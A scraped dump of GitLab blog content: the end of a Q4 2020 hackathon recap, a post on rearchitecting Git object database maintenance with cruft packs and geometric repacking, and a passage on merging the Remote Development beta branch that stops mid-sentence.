Hackathon, and all the MRs in the [Winder Community Hackathon MRs issue](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/44#related-merge-requests).\n\n- Grand Prize: [Kev](https://gitlab.com/KevSlashNull), with 31 MRs merged\n- Grand Prize: [Jonston Chan](https://gitlab.com/JonstonChan), with 30 MRs merged\n- Second Prize: [Yogi](https://gitlab.com/yo), with 16 MRs merged\n- Second Prize: [Takuya Noguchi](https://gitlab.com/tnir), with 12 MRs merged\n- Second Prize: [Marvin Karegyeya](https://gitlab.com/nuwe1), with 10 MRs merged\n\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/q4-hackathon-details.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nThe next Hackathon will occur on March 31st - April 1st, 2021 (yes, it's true!), and all the necessary information will be posted on the [Hackathon page by March 1st](/community/hackathon/).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at cbacharakis@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4560,"featured":6,"template":689},"q42020-hackathon-recap","content:en-us:blog:q42020-hackathon-recap.yml","Q42020 Hackathon Recap","en-us/blog/q42020-hackathon-recap.yml","en-us/blog/q42020-hackathon-recap",{"_path":4566,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4567,"content":4573,"config":4578,"_id":4580,"_type":14,"title":4581,"_source":16,"_file":4582,"_stem":4583,"_extension":19},"/en-us/blog/rearchitecting-git-object-database-mainentance-for-scale",{"title":4568,"description":4569,"ogTitle":4568,"ogDescription":4569,"noIndex":6,"ogImage":4570,"ogUrl":4571,"ogSiteName":673,"ogType":674,"canonicalUrls":4571,"schema":4572},"Why and how we rearchitected Git object database maintenance for scale","Go in-depth into improvements to maintenance of the Git object database for reduced overhead and increased efficiency.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664413/Blog/Hero%20Images/speedlights.png","https://about.gitlab.com/blog/rearchitecting-git-object-database-mainentance-for-scale","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why and how we rearchitected Git object database maintenance for scale\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2023-11-02\",\n      }",{"title":4568,"description":4569,"authors":4574,"heroImage":4570,"date":4575,"body":4576,"category":801,"tags":4577},[747],"2023-11-02","\n[Gitaly](/direction/gitaly/#gitaly-1), the service that is responsible for providing access to Git repositories in GitLab, needs to ensure that the repositories are maintained regularly. Regular maintenance ensures:\n\n- fast access to these repostiories for users\n- reduced resource usage for servers\n\nHowever, repository maintenance is quite expensive by itself and especially so for large monorepos.\n\nIn [a past blog post](/blog/scaling-repository-maintenance/), we discussed how we revamped the foundations of repository maintenance so that we can iterate on the exact maintenance strategy more readily. This blog post will go through improved maintenance strategies for objects hosted in a Git repository, which was enabled by that groundwork.\n\n- [The object database](#the-object-database)\n- [The old way of packing objects](#the-old-way-of-packing-objects)\n- [All-into-one repacks](#all-into-one-repacks)\n- [Deletion of unreachable objects](#deletion-of-unreachable-objects)\n- [Reachability checks](#reachability-checks)\n- [The new way of packing objects](#the-new-way-of-packing-objects)\n- [Cruft packs](#cruft-packs)\n- [More efficient incremental repacks](#more-efficient-incremental-repacks)\n- [Geometric repacking](#geometric-repacking)\n- [Real-world results](#real-world-results)\n\n## The object database\n\nWhenever a user makes changes in a Git repository, these changes come in the form of new objects written into the repository. Typically, any such object is written into the repository as a so-called \"loose object,\" which is a separate file that contains the compressed contents of the object itself with a header that identifies the type of the object.\n\nTo demonstrate this, in the following example we use\n[`git-hash-object(1)`](https://www.git-scm.com/docs/git-hash-object) to write a new blob into the repository:\n\n```shell\n $ git init --bare repository.git\nInitialized empty Git repository in /tmp/repository.git/\n $ cd repository.git/\n $ echo \"contents\" | git hash-object -w --stdin\n12f00e90b6ef79117ce6e650416b8cf517099b78\n $ tree objects\nobjects\n├── 12\n│   └── f00e90b6ef79117ce6e650416b8cf517099b78\n├── info\n└── pack\n\n4 directories, 1 file\n```\n\nAs you can see, the new object was written into the repository and stored as a separate file in the objects database.\n\nOver time, many of these loose objects will accumulate in the repository. Larger repositories tend to have millions of objects, and storing all of them as separate files is going to be inefficient. To ensure that the repository can be served efficiently to our users and to keep the load on servers low, Git will regularly compress loose objects into packfiles. We can compress loose objects manually by using, for example, [`git-pack-objects(1)`](https://www.git-scm.com/docs/git-pack-objects):\n\n```shell\n $ git pack-objects --pack-loose-unreachable ./objects/pack/pack \u003C/dev/null\nEnumerating objects: 1, done.\nCounting objects: 100% (1/1), done.\nWriting objects: 100% (1/1), done.\nTotal 1 (delta 0), reused 0 (delta 0), pack-reused 0\n7ce39d49d7ddbbbbea66ac3d5134e6089210feef\n $ tree objects\n objects/\n├── 12\n│   └── f00e90b6ef79117ce6e650416b8cf517099b78\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nThe loose object was compressed into a packfile (`.pack`) with a packfile index (`.idx`) that is used to efficiently access objects in that packfile.\n\nHowever, the loose object still exists. To remove it, we can execute [`git-prune-packed(1)`](https://www.git-scm.com/docs/git-prune-packed) to delete all objects that have been packed already:\n\n```shell\n $ git prune-packed\n $ tree objects/\nobjects/\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nFor end users of Git, all of this happens automatically because Git calls `git gc --auto` regularly. This command uses heuristics to figure out what needs to be optimized and whether loose objects need to be compressed into packfiles. This command is unsuitable for the server side because:\n\n- The command does not scale well enough in its current form. The Git project must be more conservative about changing defaults because they support a lot of different use cases. Because we know about the specific needs that we have at GitLab, we can adopt new features that allow for more efficient maintenance more readily.\n- The command does not provide an easy way to observe what exactly it is doing, so we cannot provide meaningful metrics.\n- The command does not allow us to fully control all its exact inner workings and so is not flexible enough.\n\nTherefore, Gitaly uses its own maintenance strategy to maintain Git repositories, of which maintaining the object database is one part.\n\n## The old way of packing objects\n\nAny maintenance strategy to pack objects must ensure the following three things to keep a repository efficient and effective with disk space:\n\n- Loose objects must be compressed into packfiles.\n- Packfiles must be merged into larger packfiles.\n- Objects that are not reachable anymore must be deleted eventually.\n\nPrevious to GitLab 16.0, Gitaly used the following three heuristics to ensure that those three things happened:\n\n- If the number of packfiles in the repository exceeds a certain threshold, Gitaly rewrote all packfiles into a single new packfile. Any objects that were unreachable were put into loose files so that they could be deleted after a certain grace period.\n- If the number of loose objects exceeded a certain threshold, Gitaly compressed all reachable loose objects into a new packfile.\n- If the number of loose objects that are older than the grace period for object deletion exceeded a certain threshold, Gitaly deleted those objects.\n\nWhile these heuristics satisfy all three requirements, they have several downsides, especially in large monorepos that contain gigabytes of data.\n\n### All-into-one repacks\n\nFirst and foremost, the first heuristic requires us to do all-into-one repacks where all packfiles are regularly compressed into a single packfile. In Git repositories with high activity levels, we usually create lots of packfiles during normal operations. But because we need to limit the maximum number of packfiles in a repository, we need to regularly do these complete rewrites of all objects.\n\nUnfortunately, doing such an all-into-one repack can be prohibitively expensive in large monorepos. The repacks may allocate large amounts of memory and typically keep multiple CPU cores busy during the repack, which can require hours of time to complete.\n\nSo, ideally, we want to avoid these all-into-one repacks to the best extent possible.\n\n### Deletion of unreachable objects\n\nTo avoid certain race conditions, Gitaly and Git enforce a grace period before an unreachable object is eligible for deletion. This grace period is tracked using the access time of such an unreachable object: If the last access time of the object is earlier than the grace period, the unreachable object can be deleted.\n\nTo track the access time of a single object, the object must exist as a loose object. This means that all objects that are pending deletion will be evictedfrom any packfile they were previously part of and become loose objects.\n\nBecause the grace period we have in place for Gitaly is 14 days, large monorepos tend to grow a large number of such loose object that are pending deletion. This has two effects:\n\n- The number of loose objects overall grows, which makes object lookup less efficient.\n- Loose objects are stored a lot less efficiently than packed objects, which means that the disk space required for the objects that are pending deletion is signficantly higher than if those objects were stored in their packed form.\n\nIdeally, we would be able to store unreachable objects in packed format while still being able to store their last access times separately.\n\n### Reachability checks\n\nCompressing loose objects into a new packfile is done by using an incremental repack. Git will compute the reachability of all objects in the repository and then pack all loose objects that are reachable into a new packfile.\n\nTo determine reachability of an object, we have to perform a complete graph walk. Starting at all objects that are directly referenced, we walk down any links that those objects have to any other objects. Once we reach the root of the object graph, we have then split all objects into two sets, which are the reachable and unreachable objects.\n\nThis operation can be quite expensive and the larger the repository and the more objects it contains, the more expensive this computation gets. As mentioned above though, objects which are about to be deleted need to be stored\nas loose objects such that we can track their last access time. So if our incremental repack compressed all loose objects into a packfile regardless of their reachability, then this would impact our ability to track the grace\nperiod per object.\n\nThe ideal solution here would avoid doing reachability checks altogether while still being able to track the grace period of unreachable objects which are pending deletion individually.\n\n## The new way of packing objects\n\nOver the past two years, the Git project has shipped multiple mechanisms that allow us to address all of these painpoints we had with our old strategy. These new mechanisms come in two different forms:\n\n- Geometric repacking allows us to merge multiple packfiles without having to rewrite all packfiles into one. This feature was introduced in [Git v2.32.0](https://gitlab.com/gitlab-org/git/-/commit/2744383cbda9bbbe4219bd3532757ae6d28460e1).\n- Cruft packs allow us to store objects that are pending deletion in compressed format in a packfile. This feature was introduced in [Git v2.37.0](https://gitlab.com/gitlab-org/git/-/commit/a50036da1a39806a8ae1aba2e2f2fea6f7fb8e08).\n\nThe Gitaly team has reworked the object database maintenance strategy to make use of these new features.\n\n### Cruft packs\nPrevious to Git v2.37.0, pruning objects with a grace period required Git to first unpack packed objects into loose objects. We did this so that we can track the per-object access times for unreachable objects that are pending deletion as explained above. This is inefficient though as it potentially requires us to keep a lot of unreachable objects in loose format until they can be deleted after the grace period.\n\nWith Git v2.37.0, [git-repack(1)](https://www.git-scm.com/docs/git-repack) learned to write [cruft packs](https://git-scm.com/docs/cruft-packs). While a cruft pack looks just like a normal pack, it also has an accompanying\n`.mtimes` file:\n\n```shell\n$ tree objects/\nobjects/\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.mtimes\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nThis file contains per-object timestamps that record when the object was last accessed. With this, we can continue to track per-object grace periods while storing the objects in a more efficient way compared to loose objects.\n\nIn Gitaly, we [started to make use of cruft packs](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5454) in GitLab 15.10 and made the feature generally available in GitLab 15.11. Cruft packs allow us to store objects that are pending deletion more efficiently and with less impact on the overall performance of the repository.\n\n### More efficient incremental repacks\n\nCruft packs also let us fix the issue that we had to do reachability checks when doing incremental repacks.\n\nPreviously, we had to always ensure reachability when packing loose objects so that we don't pack objects that are pending deletion. But now that any such object would be stored as part of a cruft pack and not as a loose pack anymore, we can instead compress all loose files into a packfile. This change was [introduced into Gitaly](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5660) with GitLab 16.0.\n\nIn an artificial benchmark with the Linux repository, compressing all loose objects into a packfile led to more than a 90-fold speedup, dropping from almost 13 seconds to 174 milliseconds.\n\n### Geometric repacking\n\nLast but not least, we still have the issue that we need to perform regular all-into-one repacks when we have too many packfiles in the repository.\n\nGit v2.32.0 introduced a new \"geometric\" repacking strategy for the [git-repack(1)](https://www.git-scm.com/docs/git-repack) command that will merge multiple packfiles into a single, larger packfile, that we can use to solve this issue.\n\nThis new \"geometric\" strategy tries to ensure that existing packfiles in the repository form a [geometric sequence](https://en.wikipedia.org/wiki/Geometric_progression) where each successive packfile contains at least `n` times as many objects as the preceding packfile. If the sequence isn't maintained, Git will determine a slice of packfiles that it must repack to maintain the sequence again. With this process, we can limit the number of packfiles that exist in the repository without having to repack all objects into a single packfile regularly.\n\nThe following figures demonstrate geometric repacking with a factor of two.\n\n1. We notice that the two smallest packfiles do not form a geometric sequence as they both contain two objects each.\n\n![Geometrically repacking packfiles, initial](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-1.png)\n\n1. We identify the smallest slice of packfiles that need to be repacked in order to restore the geometric sequence. Merging the smallest two packfiles would lead to a packfile with four objects. This would not be sufficient to restore the geometric sequence as the next-biggest packfile contains four objects, as well.\n\nInstead, we need to merge the smallest three packfiles into a new packfile that contains eight objects in total. As `8 × 2 ≤ 16` the geometric sequence is restored.\n\n![Geometrically repacking packfiles, combining](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-2.png)\n\n3. We merge those packfiles into a new packfile.\n\n![Geometrically repacking packfiles, final](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-3.png)\n\nOriginally, we introduced this new feature [into Gitaly in GitLab 15.11](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5590).\n\nUnfortunately, we had to quickly revert this new mode. It turned out that the geometric strategy was not ready to handle Git repositories that had an alternate object database connected to them. Because we make use of this feature to [deduplicate objects across forks](https://docs.gitlab.com/ee/development/git_object_deduplication.html), the new repacking strategy led to problems.\n\nAs active contributors to the Git project, we set out to fix these limitations in git-repack(1) itself. This led to an [upstream patch series](http://public-inbox.org/git/a07ed50feeec4bfc3e9736bf493b9876896bcdd2.1680606445.git.ps@pks.im/T/#u) that fixed a bunch of limitations around alternate object directories when doing geometric repacks in Git that was then released with Git v2.41.\n\nWith these fixes upstream, we were then able to\n[reintroduce the change](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5607) and [globally enable our new geometric repacking strategy](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5745) with GitLab 16.0.\n\n## Real-world results\n\nAll of this is kind of dry and deeply technical. What about the real-world results?\n\nThe following graphs show the global time we spent repacking objects across all projects hosted on GitLab.com.\n\n![Time spent optimizing repositories globally](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/global-optimization.png)\n\nThe initial rollout was on April 26 and progressed until April 28. As you can see, there was first a significant increase in repacking time. But after the initial dust settles, we can see that globally the time we spent repacking repositories roughly decreased by almost 20%.\n\nIn the two weeks before we enabled the feature, during weekdays and at peak times we were usually spending around 2.6 days per 12 hours repacking. In the two weeks after the feature was enabled, we spent around 2.12 days per 12 hours\nrepacking objects.\n\nThis is a success by itself already, but the more important question is how it would impact large monorepos, which are significantly harder to keep well-maintained due to their sheer size. Fortunately, the effect of the new housekeeping strategy was a lot more significant here. The following graph shows the time we spent performing housekeeping tasks in our own `gitlab-org` and `gitlab-com` groups, which host some of the most active repositories that have caused issues in the past:\n\n![Time spent optimizing repositories in GitLab groups](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/gitlab-groups-optimization.png)\n\nIn summary, we have observed the following improvements:\n\n|                                                        | Before              | After                | Change |\n| ------------------------------------------------------ | ------------------- | -------------------- | ------ |\n| Global accumulated repacking time                      | ~5.2 hours/hour     | ~4.2 hours/hour      | -20%   |\n| Large repositories of gitlab-org and gitlab-com groups | ~0.7-1.0 hours/hour | 0.12-0.15 hours/hour | -80%   |\n\nWe have heard of other customers that saw similar improvements in highly active large monorepositories.\n\n## Manually enable geometric repacking\n\nWhile the new geometric repacking strategy has been default-enabled starting with GitLab 16.0, it was introduced with GitLab 15.11. If you want to use the\nnew geometric repacking mode, you can opt in by setting the\n`gitaly_geometric_repacking` feature flag. You can do so via the `gitlab-rails`\nconsole:\n\n```\nFeature.enable(:gitaly_geometric_repacking)\n```\n",[751,1802,753,9],{"slug":4579,"featured":6,"template":689},"rearchitecting-git-object-database-mainentance-for-scale","content:en-us:blog:rearchitecting-git-object-database-mainentance-for-scale.yml","Rearchitecting Git Object Database Mainentance For Scale","en-us/blog/rearchitecting-git-object-database-mainentance-for-scale.yml","en-us/blog/rearchitecting-git-object-database-mainentance-for-scale",{"_path":4585,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4586,"content":4592,"config":4598,"_id":4600,"_type":14,"title":4601,"_source":16,"_file":4602,"_stem":4603,"_extension":19},"/en-us/blog/remote-development-beta",{"title":4587,"description":4588,"ogTitle":4587,"ogDescription":4588,"noIndex":6,"ogImage":4589,"ogUrl":4590,"ogSiteName":673,"ogType":674,"canonicalUrls":4590,"schema":4591},"Behind the scenes of the Remote Development Beta release","Discover the epic journey of GitLab's Remote Development team as they navigate last-minute pivots, adapt, and deliver new features for users worldwide.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679888/Blog/Hero%20Images/remotedevelopment.jpg","https://about.gitlab.com/blog/remote-development-beta","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Behind the scenes of the Remote Development Beta release\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"David O'Regan\"}],\n        \"datePublished\": \"2023-08-16\",\n      }",{"title":4587,"description":4588,"authors":4593,"heroImage":4589,"date":4595,"body":4596,"category":801,"tags":4597},[4594],"David O'Regan","2023-08-16","\nIn May 2023, the Create:IDE team faced an epic challenge – to merge the [Remote Development Rails monolith integration branch](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/105783) into the `master` branch of the GitLab Project. This was no small ask, as the merge request was of considerable size and complexity. In this blog post, we'll delve into the background, justifications, and process behind this endeavor.\n\nThe merge request titled \"Remote Development feature behind a feature flag\" was initiated by the Create:IDE team, aiming to merge the branch \"remote_dev\" into the \"master\" branch in the Rails monolith GitLab project. The MR contained `4` commits, `258` pipelines, and `143` changes that amounted to a total of `+7243` lines of code added to the codebase.\n\nInitially, the MR was created to reflect the work related to \"Remote Development\" under the \"Category: Remote Development.\" It was primarily intended to have CI pipeline coverage for the integration branch and was not meant for individual review or direct merging. The plan was to merge this code into the master branch via the [\"Remote Development Beta - Review and merge\" Epic](https://gitlab.com/groups/gitlab-org/-/epics/10258).\n\n![SUM](https://about.gitlab.com/images/blogimages/remote-development/SUM.png){: .shadow.medium}\n\n### How the Remote Development project started\nAs a team, we embarked on an ambitious journey to create a greenfield feature: the [Remote Development](https://docs.gitlab.com/ee/user/project/remote_development/) offering at GitLab. This feature had a vast scope, many unknowns, and required solving numerous new problems. To efficiently tackle this task, we decided to work on an integration branch using a [low-ceremony process](https://stackoverflow.com/questions/68092498/what-does-low-ceremony-mean). This decision enabled us to develop and release the feature in an impressively short time frame of less than four months.\n\nWorking on an integration branch provided us the flexibility to make significant progress, but it was always intended to eventually break down the work into smaller, iterative MRs that would follow the standard [GitLab review process](https://docs.gitlab.com/ee/development/code_review.html). We had a [detailed plan](https://gitlab.com/gitlab-org/remote-development/gitlab-remote-development-docs/-/blob/main/doc/integration-branch-process.md#master-mr-process-summary) for this process, but we realized that following the original plan would not allow us to meet our goal of releasing of the feature in GitLab 16.0.\n\n### Merging the integration branch MR without breaking it up\nDuring the development of the Remote Development feature, our team faced several challenges that led us to adopt a new approach for merging the integration branch into the master. First, as part of our [velocity-based XP/Scrum style process](https://about.gitlab.com/handbook/engineering/development/dev/create/ide/#-remote-development-iteration-planning), we realized that meeting the 16.0 release goal would require us to cut scope. A velocity report, \"[Velocity-based agile planning report](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/118436),\" highlighted that breaking down and reviewing individual MRs would take too long, considering the impending due date and the likelihood of last-minute scope additions.\n\nSecond, we [made the decision](https://gitlab.com/gitlab-org/gitlab/-/issues/398227#note_1361192858) to release workspaces as a **beta feature for public projects** for customers in [GitLab 16.0](/releases/2023/05/22/gitlab-16-0-released/#remote-development-workspaces-available-in-beta-for-public-projects). This approach reduced the complexity of the rollout plan and allowed us to get valuable feedback earlier, but required us to enable the feature by default earlier than planned. To align with this decision, we determined that merging the integration branch after review was the best course of action. An announcement was made to explain the change in plan, and we set specific timelines for the review process to ensure smooth coordination.\n\n> Hello Reviewers/Maintainers 👋 We have opened up a Zoom room through all of next week as an easy sync place for us all to collaborate and triage questions. As the MR is quite large, it might be overwhelming to determine where to begin. To help, we will aim to furnish a summary of what we have included, such as two new database tables and a couple of GraphQL/REST APIs. We will also be available through the week in the Zoom room and without it being too prescriptive of a approach, I would suggest we do a sync walkthrough of the MR first and then kick off the reviews.\n\nAddressing the concerns about risk, team members discussed the challenges and potential solutions. While there were apprehensions, we were confident in the overall quality of the feature. A disciplined plan for merging MRs was initially considered, but based on our velocity metrics, it was evident that meeting the public beta release goal required a new strategy.\n\nDespite the deviations from our usual practices, we acknowledged the urgency to deliver the initial release on time. The decision was not taken lightly, and we ensured that the merge had extensive [test coverage](https://docs.gitlab.com/ee/ci/testing/test_coverage_visualization.html) and [feature flags](https://docs.gitlab.com/ee/operations/feature_flags.html) in place to address any potential issues. We accepted that some aspects would be overlooked in the initial MR review cycle, but we committed to addressing them in subsequent iterations.\n\n### Keeping the pipeline green and stable for the merge\nTo ensure the successful merge of the integration branch containing the Remote Development feature, our team made significant efforts to keep the pipeline green and stable. As the MR was quite large and contained critical functionality, it was crucial to maintain a high level of quality and reduce the risk of introducing regressions.\n\nTo address these challenges, the team adopted a disciplined approach to [CI/CD](https://about.gitlab.com/topics/ci-cd/). Throughout the development process, CI pipelines were carefully monitored, and any failing tests or issues were promptly addressed. The team conducted rigorous testing and code reviews to identify and fix potential bugs and ensure that the changes did not negatively impact the existing functionality of the codebase.\n\nAdditionally, extensive test coverage was put in place to ensure that the new feature worked as expected and did not cause unintended side effects. The team utilized GitLab's [test coverage visualization](https://docs.gitlab.com/ee/ci/testing/test_coverage_visualization.html) capabilities to track the extent of test coverage and identify areas that required additional testing.\n\n![PIPE](https://about.gitlab.com/images/blogimages/remote-development/PIPE.png){: .shadow.medium}\n\n## The merging process\nAs part of the Remote Development team, we took a strategic approach to the merging process. We identified three categories of follow-up tasks that needed to be addressed after the release:\n\n1. **To-dos:** This category encompassed follow-up issues that required further attention.\n2. **Disabled linting rules:** Any issues related to disabled linting rules were included in this category.\n3. **Follow-up from review:** Non-blocking concerns raised during the review process were categorized here.\n\nTo manage this process effectively, we organized these categories into [child epics](https://docs.gitlab.com/ee/user/group/epics/manage_epics.html#multi-level-child-epics) under the main epic representing the merging effort.\n\n1. Child epic for [to-do follow-up issues](https://gitlab.com/groups/gitlab-org/-/epics/10472)\n2. Child epic for [disabled linting rules follow-up issues](https://gitlab.com/groups/gitlab-org/-/epics/10473)\n3. Child epic for [follow-up issues from review](https://gitlab.com/groups/gitlab-org/-/epics/10474)\n\n\n## Reviewer resources\nDuring the integration branch merge process for the Remote Development feature, we ensured a smooth and collaborative review experience for all involved. To facilitate this, we set up the following resources and documented the information in GitLab's issue, epic, and MR reviews for better persistence and traceability:\n\n1. **Dedicated Slack channel:** We had a Slack channel that served as our primary hub for coordinating reviews and resolving any blockers that arose during the process. The discussions, decisions, and important points discussed in this channel were documented in the related GitLab issues and epics. This approach enabled us to maintain a historical record of the conversations for to refer back to in the future.\n2. **General Slack channel:** For non-urgent or non-blocking questions and discussions, reviewers could use the a general Slack channel. Similar to the dedicated channel, we documented the relevant information from this channel in the corresponding issues and MR reviews in GitLab.\n3. **Addressing urgent issues:** When urgent issues required immediate attention, reviewers could directly address our technical leads [Vishal Tak](https://gitlab.com/vtak) and/or [Chad Woolley](https://gitlab.com/cwoolley-gitlab) in their Slack messages. However, we kindly requested that [direct messages were avoided](https://about.gitlab.com/handbook/communication/#avoid-direct-messages) to promote open collaboration. The resolutions to these urgent issues were documented in the corresponding GitLab issues or MR discussions.\n4. **Zoom collaboration room:** The collaborative sessions held in the open Zoom room were not only beneficial for real-time discussions but also for fostering a collaborative environment. After each session, we summarized the key points and decisions made during the meeting in the associated GitLab issue or MR, making sure all important outcomes were captured and accessible to the team.\n\nThroughout the review process, we were committed to maintaining a seamless and well-documented workflow. By capturing all relevant information in GitLab issues, epics, and MR reviews, we ensured that the knowledge was persistently available, and future team members could easily understand the context and decisions made during the integration process.\n\n## Application security review\nDuring the application security review process, we focused on providing a secure and reliable Remote Development feature for our users. Here are the key resources and updates related to the application security review:\n\n1. **Main application security review issue:** The main application security review issue served as the central hub for tracking security-related considerations. You can find the defined process we followed [here](https://about.gitlab.com/handbook/security/security-engineering/application-security/appsec-reviews.html).\n2. **Application security review comment:** The application security review issue contained a comment indicating that the merge was not blocked unless there were severe issues that could impact production. \"In order to maintain a smooth merge process, we do not block MRs from being merged unless we identify severe issues that could prevent the feature from going into production, such as S1 or S2 level problems. If you are aware of any design flaws or concerns that might qualify as such issues, please bring them to our attention. We can review them together and address any questions or concerns that arise. Let's work collaboratively to find an approach that works for both parties. 👍\"\n3. **Engineering perspective:** For managing the application security review process from an engineering team perspective, we had a dedicated issue, which is kept confidential for security reasons. \n4. **Security and authentication matters:** All security and authentication concerns pertaining to the Beta release were documented within the [`Remote Development Beta -Auth` epic](https://gitlab.com/groups/gitlab-org/-/epics/10377). As of April 30, 2023, we are delighted to announce that **no known issues or obstacles were found that would impede the merge**. This represents a significant accomplishment, considering the intricate nature of this new feature.\n5. **Initial question raised:** During the application security review, one initial question was raised, and we promptly addressed it. You can track the issue and our response [here](https://gitlab.com/gitlab-org/gitlab/-/issues/409317).\n\n## Database review\nTo ensure the reliability and efficiency of the Remote Development feature, we sought guidance from the database reviewer. Although the team had not conducted a thorough self-review, we were fully prepared to address any blocking issues raised during the review process. Our references for the review were:\n\n- [Database review documentation](https://docs.gitlab.com/ee/development/database_review.html)\n- [Database reviewer guidelines](https://docs.gitlab.com/ee/development/database/database_reviewer_guidelines.html)\n\nAs an example, during the database migration review, a discussion arose between [Alper Akgun](https://gitlab.com/a_akgun) and Chad, regarding the efficient ordering of columns in the workspaces table. Alper initially suggested placing integer values at the beginning of the table based on relevant documentation.\n\nChad questioned the benefit of this suggestion, pointing out that the specific integer field, `max_hours_before_termination`, would still be padded with empty bytes even if moved to the front, due to its current position between two text fields.\n\nAlper proposed an alternative approach, emphasizing that organizing variable-sized fields (such as `text`, `varchar`, `arrays`, `json`, `jsonb`) at the end of the table could be sufficient for the workspaces table.\n\nUltimately, Chad took the initiative to implement the changes, moving all variable length fields to the end of the table, and documented the discussion as a comment to address review suggestions.\n\nWith this collaborative effort, the workspaces table was efficiently optimized, and the team gained valuable insights into database column ordering strategies.\n\n![DB](https://about.gitlab.com/images/blogimages/remote-development/DB.png){: .shadow.medium}\n\n## Ruby code review\nDuring the Ruby code review phase, we followed a meticulous approach by conducting a comprehensive self-review of every line of code. Our goal was to ensure the highest code quality and address any potential issues identified by the reviewers effectively.\n\nTo ensure clarity, it's important to clarify that the Ruby code review primarily focused on backend changes and server-side improvements. This included optimizing performance, enhancing functionalities, and refining the overall codebase to deliver a seamless user experience.\n\nFor the code review process, we referred to the [Code review documentation](https://docs.gitlab.com/ee/development/code_review.html), a valuable resource that guided us in maintaining industry best practices and adhering to the GitLab community's coding standards.\n\n### Example: Enhance error messages for unavailable features\nAs an example during the code review, we addressed an essential aspect of the workspace method, focusing on how we handle scenarios related to the `remote_development_feature_flag` and the `remote_development` licensed feature. The primary objective was to enhance the error messages presented to users when these features are not available.\n\nInitially, the code employed identical error messages for both cases, making it less clear to users whether the issue was due to a missing license or a disabled feature flag. This ambiguity could lead to confusion and hinder the user experience.\n\n#### The suggested improvement\nDuring the review, one of our maintainers, [Peter Leitzen](https://gitlab.com/splattael), raised an important question: \"Are we OK with having only a single error message for both cases (missing license and missing feature flag)?\"\n\nRecognizing the importance of clear communication, Chad proposed enhancing the error messages to provide distinct descriptions for each case. This improvement aimed to empower users by precisely conveying the reason behind the unavailability of certain features.\n\n#### The revised implementation\nFollowing Chad's suggestion, the code underwent the following changes:\n\n```ruby\nunless ::Feature.enabled?(:remote_development_feature_flag)\n  # TODO: Could have `included Gitlab::Graphql::Authorize::AuthorizeResource` and then use\n  #       raise_resource_not_available_error!, but didn't want to take the risk to mix that into\n  #       the root query type\n  raise ::Gitlab::Graphql::Errors::ResourceNotAvailable,\n    \"'remote_development_feature_flag' feature flag is disabled\"\nend\n\nunless License.feature_available?(:remote_development)\n  # TODO: Could have `included Gitlab::Graphql::Authorize::AuthorizeResource` and then use\n  #       raise_resource_not_available_error!, but didn't want to take the risk to mix that into\n  #       the root query type\n  raise ::Gitlab::Graphql::Errors::ResourceNotAvailable,\n    \"'remote_development' licensed feature is not available\"\nend\n\nraise_resource_not_available_error!('Feature is not available') unless current_user&.can?(:read_workspace)\n```\n\n#### The value of distinct error messages\nBy implementing distinct and descriptive error messages, we reinforce our commitment to user-centric development. Users interacting with our system will receive accurate feedback, helping them navigate potential roadblocks effectively. This enhancement not only improves the user experience but also streamlines troubleshooting and support processes.\n\nThis code review example highlights the significance of concise and informative error messages in delivering a top-notch user experience within the GitLab ecosystem. Our team's collaborative efforts ensure that users can confidently interact with our platform, knowing they'll receive clear and helpful error messages when needed.\n\n![BE1](https://about.gitlab.com/images/blogimages/remote-development/BE1.png){: .shadow.medium}\n\n### Example: Improving performance and addressing N+1 issues in WorkspaceType\nIn a recent code review, our team focused on optimizing the WorkspaceType and addressing potential N+1 query problems. The discussion involved two key contributors, [Laura Montemayor](https://gitlab.com/lauraX) and Chad, who worked together to enhance the performance of the codebase.\n\n#### Identifying the performance concerns\nDuring the review, Laura raised a performance concern regarding the possibility of N+1 queries in the WorkspaceType resolver. She suggested that preloading certain associations could be beneficial to avoid this common performance issue.\n\n#### A separate issue for N+1 control\nChad took prompt action and created a separate issue specifically aimed at resolving the N+1 query problems. The new issue, titled \"Address review feedback: Resolve N+1 issues,\" would address 